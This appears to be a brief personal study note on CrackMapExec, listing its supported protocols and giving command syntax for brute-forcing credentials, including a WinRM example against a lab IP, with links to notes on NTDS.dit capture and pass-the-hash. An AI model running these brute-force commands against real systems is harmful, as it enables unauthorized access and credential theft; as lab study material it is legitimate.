#CrackMapExec #bruteforce available protocols: mssql own stuff using MSSQL ssh own stuff using SSH smb own stuff using SMB ldap own stuff using LDAP ftp own stuff using FTP winrm own stuff using WINRM rdp own stuff using RDP ## Commands ```shell crackmapexec <proto> <target-IP> -u <user or userlist> -p <password or passwordlist> crackmapexec winrm 10.129.42.197 -u user.list -p password.list ``` ## Uses ![[Attacking Active Directory & NTDS.dit#A Faster Method: Using cme to Capture NTDS.dit]] ![[Pass the Hash (PtH)#Pass the Hash with CrackMapExec (Linux)]] ![[SMB#CrackMapExec]]